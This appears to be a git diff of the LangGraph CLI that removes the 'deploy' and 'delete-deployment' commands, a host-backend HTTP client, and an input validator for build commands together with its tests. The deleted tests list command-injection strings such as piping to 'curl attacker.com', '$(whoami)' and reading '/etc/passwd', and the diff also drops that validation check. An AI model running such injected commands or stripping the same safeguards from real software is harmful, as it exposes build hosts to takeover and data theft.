passthrough: Sequence[str] = (),
install_command: str | None = None,
build_command: str | None = None,
docker_command: Sequence[str] | None = None,
extra_flags: Sequence[str] = (),
verbose: bool = True,
):
# pull latest images
if pull:
@@ -444,7 +312,7 @@ def _build(
"docker",
"pull",
langgraph_cli.config.docker_tag(config_json, base_image, api_version),
verbose=verbose,
verbose=True,
)
)
set("Building...")
@@ -466,9 +334,7 @@ def _build(
else:
build_context = str(config.parent)
# Deep copy to avoid mutating the caller's config (config_to_docker
# rewrites graph paths to container-internal paths in place).
config_json = copy.deepcopy(config_json)
# apply config
stdin, additional_contexts = langgraph_cli.config.config_to_docker(
config_path=config,
config=config_json,
@@ -482,16 +348,15 @@ def _build(
if additional_contexts:
for k, v in additional_contexts.items():
args.extend(["--build-context", f"{k}={v}"])
cmd = tuple(docker_command) if docker_command else ("docker", "build")
runner.run(
subp_exec(
*cmd,
"docker",
"build",
*args,
*extra_flags,
*passthrough,
build_context,
input=stdin,
verbose=verbose,
verbose=True,
)
)
@@ -544,18 +409,6 @@ def build(
install_command: str | None,
build_command: str | None,
):
if install_command and langgraph_cli.config.has_disallowed_build_command_content(
install_command
):
raise click.UsageError(
"install_command contains disallowed characters or patterns."
)
if build_command and langgraph_cli.config.has_disallowed_build_command_content(
build_command
):
raise click.UsageError(
"build_command contains disallowed characters or patterns."
)
with Runner() as runner, Progress(message="Pulling...") as set:
if shutil.which("docker") is None:
raise click.UsageError("Docker not installed") from None
@@ -576,538 +429,6 @@ def build(
)
@click.option(
"--api-key",
envvar="LANGGRAPH_HOST_API_KEY",
help=(
"API key. Can also be set via LANGGRAPH_HOST_API_KEY, "
"LANGSMITH_API_KEY, or LANGCHAIN_API_KEY environment variable or .env file."
),
)
@click.option(
"--name",
envvar="LANGSMITH_DEPLOYMENT_NAME",
help=(
"Deployment name. Can also be set via LANGSMITH_DEPLOYMENT_NAME "
"environment variable or .env file. Defaults to current directory name "
"if --deployment-id is not provided."
),
)
@click.option(
"--deployment-id",
help=(
"ID of an existing deployment to update. If omitted, "
"--name is used to find or create the deployment."
),
)
@click.option(
"--deployment-type",
type=click.Choice(["dev", "prod"]),
default="dev",
show_default=True,
help="Deployment type (used when creating a new deployment).",
)
@click.option(
"--no-wait",
is_flag=True,
default=False,
help="Skip waiting for deployment status.",
)
@OPT_VERBOSE
@click.option(
"--host-url",
envvar="LANGGRAPH_HOST_URL",
default="https://api.host.langchain.com",
hidden=True,
)
@click.option("--image-name", hidden=True)
@click.option("--image-tag", default="latest", hidden=True)
@click.option(
"--config",
"-c",
default=DEFAULT_CONFIG,
hidden=True,
type=click.Path(
exists=True,
file_okay=True,
dir_okay=False,
resolve_path=True,
path_type=pathlib.Path,
),
)
@click.option("--pull/--no-pull", default=True, hidden=True)
@click.option("--base-image", hidden=True)
@click.option("--install-command", hidden=True)
@click.option("--build-command", hidden=True)
@click.option("--api-version", type=str, hidden=True)
@click.argument("docker_build_args", nargs=-1, type=click.UNPROCESSED)
@cli.command(
help=(
"[Beta] Build and deploy a LangGraph image to LangSmith Deployments.\n\n"
"This command is in beta and under active development. "
"Expect frequent updates and improvements.\n\n"
"Run from the root of your LangGraph project (where langgraph.json "
"is located). This command also accepts build flags (--base-image, "
"--pull, etc.). See 'langgraph build --help' for details."
),
context_settings=dict(ignore_unknown_options=True),
)
@log_command
def deploy(
config: pathlib.Path,
pull: bool,
verbose: bool,
api_version: str | None,
host_url: str | None,
api_key: str | None,
deployment_id: str | None,
deployment_type: str,
name: str | None,
image_name: str | None,
image_tag: str,
base_image: str | None,
install_command: str | None,
build_command: str | None,
no_wait: bool,
docker_build_args: Sequence[str],
):
click.secho(
"Note: 'langgraph deploy' is in beta. Expect frequent updates and improvements.",
fg="yellow",
)
click.echo()
config_json = langgraph_cli.config.validate_config_file(config)
warn_non_wolfi_distro(config_json)
env_vars = _parse_env_from_config(config_json, config)
if not api_key:
for key_name in _API_KEY_ENV_NAMES:
val = env_vars.get(key_name) or os.environ.get(key_name)
if val:
api_key = val
break
if not api_key:
api_key = click.prompt("Host API key", hide_input=True)
if not deployment_id and not name:
name = env_vars.get(_DEPLOYMENT_NAME_ENV)
if not deployment_id and not name:
default_name = _normalize_image_name(pathlib.Path.cwd().name)
name = click.prompt("Deployment name", default=default_name)
secrets = _secrets_from_env(env_vars)
# Use buildx to cross-compile for amd64 when running on a non-x86_64 host
# (e.g. Apple Silicon). On amd64 hosts, plain docker build is sufficient.
needs_buildx = platform.machine() != "x86_64"
local_tag = f"langgraph-deploy-tmp:{int(time.time())}"
with Runner() as runner:
if shutil.which("docker") is None:
raise click.UsageError(
"Docker is required but not installed.\n"
"Install Docker Desktop: https://docs.docker.com/get-docker/\n\n"
"Remote builds (no Docker required) are coming in a future update."
)
if needs_buildx:
try:
runner.run(subp_exec("docker", "buildx", "version", collect=True))
except click.exceptions.Exit:
raise click.UsageError(
"Docker Buildx is required but not installed.\n"
"Your machine architecture ("
+ platform.machine()
+ ") requires Buildx to cross-compile images for linux/amd64.\n"
"Install Buildx: https://docs.docker.com/build/install-buildx/\n\n"
"Remote builds (no Docker required) are coming in a future update."
) from None
def log_step(message: str) -> None:
click.secho(message, fg="cyan")
step = 1
# -- Step: Build image --
log_step(f"{step}. Building image")
if needs_buildx:
build_flags: list[str] = [
"--platform",
"linux/amd64",
"--load",
]
if not verbose:
build_flags.append("--progress=quiet")
with Progress(message="Building...", elapsed=not verbose):
_build(
runner,
lambda _msg: None,
config,
config_json,
base_image,
api_version,
pull,
local_tag,
docker_build_args,
install_command,
build_command,
docker_command=("docker", "buildx", "build"),
extra_flags=build_flags,
verbose=verbose,
)
else:
with Progress(message="Building...", elapsed=not verbose):
_build(
runner,
lambda _msg: None,
config,
config_json,
base_image,
api_version,
pull,
local_tag,
docker_build_args,
install_command,
build_command,
verbose=verbose,
)
step += 1
# -- Step: Find or create deployment --
client = HostBackendClient(host_url, api_key)
if deployment_id:
log_step(f"{step}. Using deployment {deployment_id}")
step += 1
else:
log_step(f"{step}. Looking up deployment '{name}'")
try:
existing = client.list_deployments(name_contains=name)
except HostBackendError as err:
if (
err.status_code == 403
and "requires workspace specification" in err.message
):
click.secho(
"Your API key is org-scoped and requires a workspace ID.",
fg="yellow",
)
click.secho(
"Find your workspace ID in LangSmith under Settings > Workspaces.",
fg="yellow",
)
tenant_id = click.prompt("Workspace ID")
client = HostBackendClient(host_url, api_key, tenant_id=tenant_id)
existing = client.list_deployments(name_contains=name)
else:
raise
found_id = None
if isinstance(existing, dict):
for dep in existing.get("resources", []):
if isinstance(dep, dict) and dep.get("name") == name:
found_id = dep.get("id")
break
if found_id:
deployment_id = str(found_id)
click.secho(
f" Found existing deployment (ID: {deployment_id})",
fg="green",
)
else:
log_step(f" Creating deployment '{name}'")
payload = {
"name": name,
"source": "internal_docker",
"source_config": {"deployment_type": deployment_type},
"source_revision_config": {},
"secrets": secrets,
}
created = client.create_deployment(payload)
created_id = created.get("id") if isinstance(created, dict) else None
if not isinstance(created_id, str) or not created_id:
raise HostBackendError(
"POST /v2/deployments succeeded but response "
"missing a valid 'id'"
)
deployment_id = created_id
click.secho(f" Deployment ID: {deployment_id}", fg="green")
step += 1
# -- Step: Get push token and authenticate --
log_step(f"{step}. Requesting push token")
try:
push_data = client.request_push_token(deployment_id)
except HostBackendError as err:
if (
err.status_code == 400
and "only available for 'internal_docker' source deployments"
in err.message
):
raise click.ClickException(
f"Deployment '{deployment_id}' was not created by 'langgraph deploy' "
"and cannot be updated with this command.\n"
"Please create a new deployment by running 'langgraph deploy' "
"without --deployment-id, or use a different --name."
) from None
raise
deployment_token = push_data.get("token")
registry_url = push_data.get("registry_url")
if not deployment_token or not registry_url:
raise click.ClickException(
"Push token response missing token or registry_url"
)
step += 1
normalized_registry = registry_url.rstrip("/")
if "://" in normalized_registry:
normalized_registry = normalized_registry.split("//", 1)[1]
repo_seed = image_name or name or config.parent.name
repo_name = _normalize_image_name(repo_seed)
tag_value = _normalize_image_tag(image_tag)
remote_image = f"{normalized_registry}/{repo_name}:{tag_value}"
registry_host = normalized_registry.split("/")[0]
# Use a clean Docker config with only the push token so that
# system credential helpers (e.g. gcloud) don't interfere.
with _docker_config_for_token(registry_host, deployment_token) as cfg:
log_step(f"{step}. Logging into {registry_host}")
token_input = (
deployment_token
if deployment_token.endswith("\n")
else f"{deployment_token}\n"
)
runner.run(
subp_exec(
"docker",
"--config",
cfg,
"login",
"-u",
"oauth2accesstoken",
"--password-stdin",
registry_host,
input=token_input,
verbose=verbose,
)
)
step += 1
# -- Step: Tag and push --
log_step(f"{step}. Pushing image {remote_image}")
runner.run(
subp_exec(
"docker",
"tag",
local_tag,
remote_image,
verbose=verbose,
)
)
max_push_retries = 3
for attempt in range(max_push_retries):
try:
with Progress(message="Pushing...", elapsed=not verbose):
runner.run(
subp_exec(
"docker",
"--config",
cfg,
"push",
remote_image,
verbose=verbose,
)
)
break
except click.exceptions.Exit:
if attempt < max_push_retries - 1:
click.secho(
f" Push failed, retrying (attempt {attempt + 2} of {max_push_retries})...",
fg="yellow",
)
else:
raise
step += 1
# -- Step: Update deployment --
log_step(f"{step}. Updating deployment {deployment_id}")
updated = client.update_deployment(deployment_id, remote_image, secrets=secrets)
tenant_id = updated.get("tenant_id") if isinstance(updated, dict) else None
if tenant_id:
status_url = (
f"https://smith.langchain.com/o/{tenant_id}"
f"/host/deployments/{deployment_id}"
)
click.secho(f" View status: {status_url}", fg="cyan")
if no_wait:
click.secho(" Deployment updated", fg="green")
return
# -- Poll revision status --
revisions_resp = client.list_revisions(deployment_id, limit=1)
resources = (
revisions_resp.get("resources", [])
if isinstance(revisions_resp, dict)
else []
)
if not resources:
click.secho(" Deployment updated", fg="green")
return
revision_id = str(resources[0]["id"])
last_status = ""
deadline = time.time() + 300
with Progress(message="Deploying...", elapsed=True) as set_progress:
while time.time() < deadline:
rev = client.get_revision(deployment_id, revision_id)
status = (
rev.get("status", "UNKNOWN") if isinstance(rev, dict) else "UNKNOWN"
)
if status != last_status:
last_status = status
# pause spinner so we can avoid conflict when writing status
set_progress("")
click.secho(f" Status: {status}", fg="cyan")
if status in _TERMINAL_STATUSES:
break
set_progress(f"{status}...")
time.sleep(1)
else:
set_progress("")
dep_info = client.get_deployment(deployment_id)
custom_url = None
if isinstance(dep_info, dict):
sc = dep_info.get("source_config")
if isinstance(sc, dict):
custom_url = sc.get("custom_url")
if last_status == "DEPLOYED":
click.secho(" Deployment successful!", fg="green")
if custom_url:
click.secho(f" URL: {custom_url}", fg="green")
elif last_status in ("BUILD_FAILED", "DEPLOY_FAILED", "CREATE_FAILED"):
click.secho(f" Deployment failed: {last_status}", fg="red")
raise click.exceptions.Exit(1)
else:
click.secho(
f" Timed out waiting for deployment (last status: {last_status}).",
fg="yellow",
)
if custom_url:
click.secho(
f" Check status at: {custom_url}",
fg="yellow",
)
else:
click.secho(
" Check status in the LangSmith Deployments dashboard.",
fg="yellow",
)
@click.option(
"--api-key",
envvar="LANGGRAPH_HOST_API_KEY",
help=(
"API key. Can also be set via LANGGRAPH_HOST_API_KEY, "
"LANGSMITH_API_KEY, or LANGCHAIN_API_KEY environment variable or .env file."
),
)
@click.option(
"--host-url",
envvar="LANGGRAPH_HOST_URL",
default="https://api.host.langchain.com",
hidden=True,
)
@click.option(
"--force",
is_flag=True,
default=False,
help="Delete the deployment without prompting for confirmation.",
)
@click.argument("deployment_id")
@cli.command(
help=(
"[Beta] Delete a LangSmith Deployment.\n\n"
"This command is in beta and under active development."
)
)
@log_command
def delete_deployment(
deployment_id: str,
host_url: str | None,
api_key: str | None,
force: bool,
) -> None:
click.secho(
"Note: 'langgraph delete-deployment' is in beta. Expect frequent updates and improvements.",
fg="yellow",
)
click.echo()
if not api_key:
api_key = click.prompt("Host API key", hide_input=True)
if not force:
confirmation = click.prompt(
f"Are you sure you want to delete deployment ID {deployment_id} (Y/n)?",
default="N",
show_default=False,
)
if confirmation.strip() != "Y":
raise click.ClickException("Deployment not deleted.")
client = HostBackendClient(host_url, api_key)
try:
client.delete_deployment(deployment_id)
except HostBackendError as err:
if err.status_code == 403 and "requires workspace specification" in err.message:
click.secho(
"Your API key is org-scoped and requires a workspace ID.",
fg="yellow",
)
click.secho(
"Find your workspace ID in LangSmith under Settings > Workspaces.",
fg="yellow",
)
tenant_id = click.prompt("Workspace ID")
client = HostBackendClient(host_url, api_key, tenant_id=tenant_id)
client.delete_deployment(deployment_id)
else:
raise
click.secho(f"Deleted deployment '{deployment_id}'.", fg="green")
def _normalize_image_name(value: str | None) -> str:
"""Sanitize a deployment/directory name into a valid Docker repository name.
Docker repository names must be lowercase and may only contain
[a-z0-9._-]. Invalid characters are replaced with hyphens.
"""
if not value:
return "app"
slug = re.sub(r"[^a-z0-9._-]+", "-", value.lower()).strip("-.")
return slug or "app"
def _normalize_image_tag(value: str) -> str:
"""Validate and return a Docker image tag.
Tags may only contain [A-Za-z0-9_.-]. Defaults to "latest" when empty.
"""
if not value:
value = "latest"
if not re.fullmatch(r"[A-Za-z0-9_.-]+", value):
raise click.UsageError(
"Image tag may only contain characters A-Z, a-z, 0-9, '_', '-', '.'"
)
return value
def _get_docker_ignore_content() -> str:
"""Return the content of a .dockerignore file.
@@ -1444,8 +765,6 @@ def dev(
allow_blocking=allow_blocking,
tunnel=tunnel,
server_level=server_log_level,
checkpointer=config_json.get("checkpointer"),
disable_persistence=config_json.get("disable_persistence", False),
)
-30
View File
@@ -13,36 +13,6 @@ from langgraph_cli.schemas import Config, Distros
MIN_NODE_VERSION = "20"
DEFAULT_NODE_VERSION = "20"
DISALLOWED_BUILD_COMMAND_CHARS = [
'"',
"`",
"\\",
"\n",
"\r",
"\0",
"\t",
"|",
";",
"$",
">",
"<",
]
# Regex pattern matching a single "&" that is NOT part of "&&".
# This blocks background execution (cmd &) while allowing command
# chaining (cmd1 && cmd2) which is common in build commands.
_SINGLE_AMPERSAND_RE = re.compile(r"(?<!&)&(?:&&)*(?!&)")
def has_disallowed_build_command_content(command: str) -> bool:
"""Check if a command string contains disallowed characters or patterns."""
if any(char in command for char in DISALLOWED_BUILD_COMMAND_CHARS):
return True
if _SINGLE_AMPERSAND_RE.search(command):
return True
return False
MIN_PYTHON_VERSION = "3.11"
DEFAULT_PYTHON_VERSION = "3.11"
-110
View File
@@ -1,110 +0,0 @@
"""HTTP client for LangGraph host backend deployments."""
from __future__ import annotations
from typing import Any
import click
import httpx
class HostBackendError(click.ClickException):
"""Raised when the host backend returns an error response."""
def __init__(self, message: str, status_code: int | None = None):
super().__init__(message)
self.status_code = status_code
class HostBackendClient:
"""Minimal JSON HTTP client for the host backend deployment service."""
def __init__(self, base_url: str, api_key: str, tenant_id: str | None = None):
if not base_url:
raise click.UsageError("Host backend URL is required")
transport = httpx.HTTPTransport(retries=3)
headers: dict[str, str] = {
"X-Api-Key": api_key,
"Accept": "application/json",
}
if tenant_id:
headers["X-Tenant-ID"] = tenant_id
self._base_url = base_url.rstrip("/")
self._api_key = api_key
self._client = httpx.Client(
base_url=self._base_url,
headers=headers,
transport=transport,
timeout=30,
)
def _request(
self, method: str, path: str, payload: dict[str, Any] | None = None
) -> Any:
try:
resp = self._client.request(method, path, json=payload)
resp.raise_for_status()
except httpx.HTTPStatusError as err:
detail = err.response.text or str(err.response.status_code)
raise HostBackendError(
f"{method} {path} failed with status {err.response.status_code}: {detail}",
status_code=err.response.status_code,
) from None
except httpx.TransportError as err:
raise HostBackendError(str(err)) from None
if not resp.content:
return None
try:
return resp.json()
except ValueError as err:
raise HostBackendError(
f"Failed to decode response from {path}: {err}"
) from None
def create_deployment(self, payload: dict[str, Any]) -> dict[str, Any]:
return self._request("POST", "/v2/deployments", payload)
def list_deployments(self, name_contains: str) -> dict[str, Any]:
return self._request("GET", f"/v2/deployments?name_contains={name_contains}")
def get_deployment(self, deployment_id: str) -> dict[str, Any]:
return self._request("GET", f"/v2/deployments/{deployment_id}")
def delete_deployment(self, deployment_id: str) -> None:
self._request("DELETE", f"/v2/deployments/{deployment_id}")
def request_push_token(self, deployment_id: str) -> dict[str, Any]:
return self._request(
"POST",
f"/v2/deployments/{deployment_id}/push-token",
)
def update_deployment(
self,
deployment_id: str,
image_uri: str,
secrets: list[dict[str, str]] | None = None,
) -> dict[str, Any]:
payload: dict[str, Any] = {
"source_revision_config": {"image_uri": image_uri},
}
if secrets is not None:
payload["secrets"] = secrets
return self._request(
"PATCH",
f"/v2/deployments/{deployment_id}",
payload,
)
def list_revisions(self, deployment_id: str, limit: int = 1) -> dict[str, Any]:
return self._request(
"GET",
f"/v2/deployments/{deployment_id}/revisions?limit={limit}",
)
def get_revision(self, deployment_id: str, revision_id: str) -> dict[str, Any]:
return self._request(
"GET",
f"/v2/deployments/{deployment_id}/revisions/{revision_id}",
)
+6 -25
View File
@@ -12,12 +12,8 @@ class Progress:
while True:
yield from "|/-\\"
def __init__(self, *, message="", elapsed: bool = False):
def __init__(self, *, message=""):
self.message = message
self._base_message = message
self._show_elapsed = elapsed
# use this to make sure we don't kill thread when we set msg to ""
self._stop = threading.Event()
self.spinner_generator = self.spinning_cursor()
def spinner_iteration(self):
@@ -33,23 +29,9 @@ class Progress:
)
sys.stdout.flush()
def _format_elapsed(self, seconds: float) -> str:
mins, secs = divmod(int(seconds), 60)
if mins:
return f"{self._base_message} ({mins}m {secs:02d}s)"
return f"{self._base_message} ({secs}s)"
def spinner_task(self):
start = time.monotonic()
while not self._stop.is_set():
if not self.message:
time.sleep(self.delay)
continue
if self._show_elapsed:
self.message = self._format_elapsed(time.monotonic() - start)
while self.message:
message = self.message
if not message:
continue
sys.stdout.write(next(self.spinner_generator) + " " + message)
sys.stdout.flush()
time.sleep(self.delay)
@@ -68,22 +50,21 @@ class Progress:
def set_message(message):
self.message = message
self._base_message = message or self._base_message
if not message:
self.thread.join()
return set_message
else:
def set_message(message):
if message:
sys.stderr.write(message + "\n")
sys.stderr.flush()
sys.stderr.write(message + "\n")
sys.stderr.flush()
return set_message
def __exit__(self, exception, value, tb):
if sys.stdout.isatty():
self.message = ""
self._stop.set()
try:
self.thread.join()
finally:
+1 -2
View File
@@ -13,9 +13,7 @@ license = "MIT"
license-files = ['LICENSE']
dependencies = [
"click>=8.1.7",
"httpx>=0.24.0",
"langgraph-sdk>=0.1.0 ; python_version >= '3.11'",
"python-dotenv>=0.8.0",
]
[tool.hatch.version]
path = "langgraph_cli/__init__.py"
@@ -23,6 +21,7 @@ path = "langgraph_cli/__init__.py"
inmem = [
"langgraph-api>=0.5.35,<0.8.0 ; python_version >= '3.11'",
"langgraph-runtime-inmem>=0.7 ; python_version >= '3.11'",
"python-dotenv>=0.8.0",
]
[project.urls]
-92
View File
@@ -7,7 +7,6 @@ import textwrap
from contextlib import contextmanager
from pathlib import Path
import pytest
from click.testing import CliRunner
from langgraph_cli.cli import cli, prepare_args_and_stdin
@@ -288,97 +287,6 @@ def test_version_option() -> None:
)
def test_delete_deployment_command_calls_backend(
monkeypatch: pytest.MonkeyPatch,
) -> None:
calls: list[tuple[str | None, str, str | None]] = []
class FakeHostBackendClient:
def __init__(
self, base_url: str | None, api_key: str, tenant_id: str | None = None
) -> None:
calls.append((base_url, api_key, tenant_id))
def delete_deployment(self, deployment_id: str) -> None:
calls.append(("delete", deployment_id, None))
monkeypatch.setattr("langgraph_cli.cli.HostBackendClient", FakeHostBackendClient)
runner = CliRunner()
result = runner.invoke(
cli,
["delete-deployment", "--api-key", "test-key", "dep-123"],
input="Y\n",
)
assert result.exit_code == 0, result.output
assert calls == [
("https://api.host.langchain.com", "test-key", None),
("delete", "dep-123", None),
]
assert "Deleted deployment 'dep-123'." in result.output
def test_delete_deployment_command_requires_y(
monkeypatch: pytest.MonkeyPatch,
) -> None:
called = False
class FakeHostBackendClient:
def __init__(
self, base_url: str | None, api_key: str, tenant_id: str | None = None
) -> None:
nonlocal called
called = True
def delete_deployment(self, deployment_id: str) -> None:
nonlocal called
called = True
monkeypatch.setattr("langgraph_cli.cli.HostBackendClient", FakeHostBackendClient)
runner = CliRunner()
result = runner.invoke(
cli,
["delete-deployment", "--api-key", "test-key", "dep-123"],
input="N\n",
)
assert result.exit_code != 0
assert "Deployment not deleted." in result.output
assert called is False
def test_delete_deployment_command_force_skips_confirmation(
monkeypatch: pytest.MonkeyPatch,
) -> None:
calls: list[tuple[str | None, str, str | None]] = []
class FakeHostBackendClient:
def __init__(
self, base_url: str | None, api_key: str, tenant_id: str | None = None
) -> None:
calls.append((base_url, api_key, tenant_id))
def delete_deployment(self, deployment_id: str) -> None:
calls.append(("delete", deployment_id, None))
monkeypatch.setattr("langgraph_cli.cli.HostBackendClient", FakeHostBackendClient)
runner = CliRunner()
result = runner.invoke(
cli,
["delete-deployment", "--api-key", "test-key", "--force", "dep-123"],
)
assert result.exit_code == 0, result.output
assert "Type Y to delete deployment" not in result.output
assert calls == [
("https://api.host.langchain.com", "test-key", None),
("delete", "dep-123", None),
]
def test_dockerfile_command_basic() -> None:
"""Test the 'dockerfile' command with basic configuration."""
runner = CliRunner()
-47
View File
@@ -14,7 +14,6 @@ from langgraph_cli.config import (
config_to_compose,
config_to_docker,
docker_tag,
has_disallowed_build_command_content,
validate_config,
validate_config_file,
)
@@ -1693,49 +1692,3 @@ def test_config_to_compose_with_api_version():
# Check that the compose file includes the correct FROM line with api_version
assert "FROM langchain/langgraphjs-api:0.2.74-node20" in actual_compose_str
class TestHasDisallowedBuildCommandContent:
"""Tests for has_disallowed_build_command_content."""
@pytest.mark.parametrize(
"char",
['"', "`", "\\", "\n", "\r", "\0", "\t", "|", ";", "$", ">", "<"],
)
def test_disallowed_chars_rejected(self, char: str) -> None:
assert has_disallowed_build_command_content(f"npm install{char}some-package")
@pytest.mark.parametrize(
"cmd",
[
"pip install foo | curl attacker.com",
"npm install; curl evil.com",
"pip install $(whoami)",
"pip install ${IFS}evil",
"curl evil.com & disown",
"npm install & curl evil.com",
"pip install > /dev/null",
"cat < /etc/passwd",
],
)
def test_injection_patterns_rejected(self, cmd: str) -> None:
assert has_disallowed_build_command_content(cmd)
def test_single_ampersand_rejected(self) -> None:
assert has_disallowed_build_command_content("npm install & curl evil.com")
def test_double_ampersand_allowed(self) -> None:
assert not has_disallowed_build_command_content("npm install && npm run build")
@pytest.mark.parametrize(
"cmd",
[
"npm install",
"pnpm install --frozen-lockfile",
"next build && next export",
"npm ci && npm run build",
"pip install -e '.[dev]'",
],
)
def test_valid_commands_allowed(self, cmd: str) -> None:
assert not has_disallowed_build_command_content(cmd)
@@ -1,134 +0,0 @@
import base64
import json
import os
import click
import pytest
from langgraph_cli.cli import (
_docker_config_for_token,
_normalize_image_name,
_normalize_image_tag,
_parse_env_from_config,
)
class TestDockerConfigForToken:
def test_creates_config_json(self):
with _docker_config_for_token("us-docker.pkg.dev", "my-token") as cfg:
config_path = os.path.join(cfg, "config.json")
assert os.path.isfile(config_path)
with open(config_path) as f:
data = json.load(f)
expected_auth = base64.b64encode(b"oauth2accesstoken:my-token").decode()
assert data == {"auths": {"us-docker.pkg.dev": {"auth": expected_auth}}}
def test_tempdir_cleaned_up(self):
with _docker_config_for_token("registry.example.com", "tok") as cfg:
assert os.path.isdir(cfg)
assert not os.path.exists(cfg)
def test_different_registries(self):
with _docker_config_for_token("gcr.io", "token123") as cfg:
with open(os.path.join(cfg, "config.json")) as f:
data = json.load(f)
assert "gcr.io" in data["auths"]
class TestNormalizeImageName:
def test_simple_name(self):
assert _normalize_image_name("myapp") == "myapp"
def test_uppercase_lowered(self):
assert _normalize_image_name("MyApp") == "myapp"
def test_special_chars_replaced(self):
assert _normalize_image_name("my app!@#v2") == "my-app-v2"
def test_dots_and_hyphens_kept(self):
assert _normalize_image_name("my-app.v2") == "my-app.v2"
def test_leading_trailing_stripped(self):
assert _normalize_image_name("--my-app..") == "my-app"
def test_empty_string_returns_app(self):
assert _normalize_image_name("") == "app"
def test_none_returns_app(self):
assert _normalize_image_name(None) == "app"
def test_all_invalid_chars_returns_app(self):
assert _normalize_image_name("!!!") == "app"
class TestNormalizeImageTag:
def test_valid_tag(self):
assert _normalize_image_tag("v1.2.3") == "v1.2.3"
def test_empty_defaults_to_latest(self):
assert _normalize_image_tag("") == "latest"
def test_alphanumeric_and_special(self):
assert _normalize_image_tag("my_tag-1.0") == "my_tag-1.0"
def test_invalid_chars_raises(self):
with pytest.raises(click.UsageError, match="Image tag may only contain"):
_normalize_image_tag("v1.0:bad")
def test_spaces_raises(self):
with pytest.raises(click.UsageError, match="Image tag may only contain"):
_normalize_image_tag("has space")
class TestParseEnvFromConfig:
def test_env_dict(self, tmp_path):
config_path = tmp_path / "langgraph.json"
config_path.touch()
result = _parse_env_from_config({"env": {"FOO": "bar", "NUM": 42}}, config_path)
assert result == {"FOO": "bar", "NUM": "42"}
def test_env_string_dotenv_file(self, tmp_path):
env_file = tmp_path / "my.env"
env_file.write_text("KEY1=val1\nKEY2=val2\n")
config_path = tmp_path / "langgraph.json"
config_path.touch()
result = _parse_env_from_config({"env": "my.env"}, config_path)
assert result == {"KEY1": "val1", "KEY2": "val2"}
def test_env_missing_falls_back_to_dotenv(self, tmp_path, monkeypatch):
env_file = tmp_path / ".env"
env_file.write_text("DEFAULT_KEY=default_val\n")
monkeypatch.chdir(tmp_path)
config_path = tmp_path / "langgraph.json"
config_path.touch()
result = _parse_env_from_config({}, config_path)
assert result == {"DEFAULT_KEY": "default_val"}
def test_env_empty_dict_falls_back_to_dotenv(self, tmp_path, monkeypatch):
"""validate_config defaults env to {}, should still fall back to .env."""
env_file = tmp_path / ".env"
env_file.write_text("MY_KEY=my_val\n")
monkeypatch.chdir(tmp_path)
config_path = tmp_path / "langgraph.json"
config_path.touch()
result = _parse_env_from_config({"env": {}}, config_path)
assert result == {"MY_KEY": "my_val"}
def test_env_missing_no_dotenv_returns_empty(self, tmp_path, monkeypatch):
monkeypatch.chdir(tmp_path)
config_path = tmp_path / "langgraph.json"
config_path.touch()
result = _parse_env_from_config({}, config_path)
assert result == {}
def test_env_dotenv_filters_none_values(self, tmp_path):
# Lines like "KEY=" produce empty string, lines like "KEY" produce None
env_file = tmp_path / "test.env"
env_file.write_text("GOOD=value\nEMPTY=\n")
config_path = tmp_path / "langgraph.json"
config_path.touch()
result = _parse_env_from_config({"env": "test.env"}, config_path)
assert "GOOD" in result
assert result["GOOD"] == "value"
# EMPTY= gives empty string, not None, so it should be present
assert result["EMPTY"] == ""
@@ -1,166 +0,0 @@
import httpx
import pytest
from langgraph_cli.host_backend import HostBackendClient, HostBackendError
@pytest.fixture
def mock_transport():
return httpx.MockTransport(lambda req: httpx.Response(200, json={"ok": True}))
@pytest.fixture
def client(mock_transport):
c = HostBackendClient("https://api.example.com", "test-key")
c._client = httpx.Client(
base_url="https://api.example.com",
transport=mock_transport,
headers={"X-Api-Key": "test-key", "Accept": "application/json"},
timeout=30,
)
return c
def test_constructor_strips_trailing_slash():
c = HostBackendClient("https://api.example.com/", "key")
assert str(c._client.base_url) == "https://api.example.com"
def test_constructor_empty_url_raises():
with pytest.raises(Exception, match="Host backend URL is required"):
HostBackendClient("", "key")
def test_request_sends_headers():
def handler(req: httpx.Request) -> httpx.Response:
assert req.headers["x-api-key"] == "test-key"
assert req.headers["accept"] == "application/json"
return httpx.Response(200, json={"ok": True})
c = HostBackendClient("https://api.example.com", "test-key")
c._client = httpx.Client(
base_url="https://api.example.com",
transport=httpx.MockTransport(handler),
headers={"X-Api-Key": "test-key", "Accept": "application/json"},
timeout=30,
)
result = c._request("GET", "/test")
assert result == {"ok": True}
def test_request_sends_json_payload():
def handler(req: httpx.Request) -> httpx.Response:
assert req.headers["content-type"] == "application/json"
assert req.content == b'{"key":"value"}'
return httpx.Response(200, json={"created": True})
c = HostBackendClient("https://api.example.com", "test-key")
c._client = httpx.Client(
base_url="https://api.example.com",
transport=httpx.MockTransport(handler),
headers={"X-Api-Key": "test-key", "Accept": "application/json"},
timeout=30,
)
result = c._request("POST", "/test", {"key": "value"})
assert result == {"created": True}
def test_request_empty_body_returns_none():
transport = httpx.MockTransport(lambda req: httpx.Response(200, content=b""))
c = HostBackendClient("https://api.example.com", "test-key")
c._client = httpx.Client(
base_url="https://api.example.com",
transport=transport,
headers={"X-Api-Key": "test-key", "Accept": "application/json"},
timeout=30,
)
assert c._request("DELETE", "/test") is None
def test_request_http_error_raises():
transport = httpx.MockTransport(lambda req: httpx.Response(404, text="not found"))
c = HostBackendClient("https://api.example.com", "test-key")
c._client = httpx.Client(
base_url="https://api.example.com",
transport=transport,
headers={"X-Api-Key": "test-key", "Accept": "application/json"},
timeout=30,
)
with pytest.raises(HostBackendError, match="404"):
c._request("GET", "/missing")
def test_request_invalid_json_raises():
transport = httpx.MockTransport(
lambda req: httpx.Response(200, content=b"not json")
)
c = HostBackendClient("https://api.example.com", "test-key")
c._client = httpx.Client(
base_url="https://api.example.com",
transport=transport,
headers={"X-Api-Key": "test-key", "Accept": "application/json"},
timeout=30,
)
with pytest.raises(HostBackendError, match="Failed to decode"):
c._request("GET", "/bad-json")
def test_request_transport_error_raises():
def handler(req: httpx.Request) -> httpx.Response:
raise httpx.ConnectError("connection refused")
c = HostBackendClient("https://api.example.com", "test-key")
c._client = httpx.Client(
base_url="https://api.example.com",
transport=httpx.MockTransport(handler),
headers={"X-Api-Key": "test-key", "Accept": "application/json"},
timeout=30,
)
with pytest.raises(HostBackendError, match="connection refused"):
c._request("GET", "/test")
def test_create_deployment(client):
result = client.create_deployment({"name": "my-deploy"})
assert result == {"ok": True}
def test_get_deployment(client):
result = client.get_deployment("dep-123")
assert result == {"ok": True}
def test_delete_deployment(client):
assert client.delete_deployment("dep-123") is None
def test_list_deployments(client):
result = client.list_deployments("my-app")
assert result == {"ok": True}
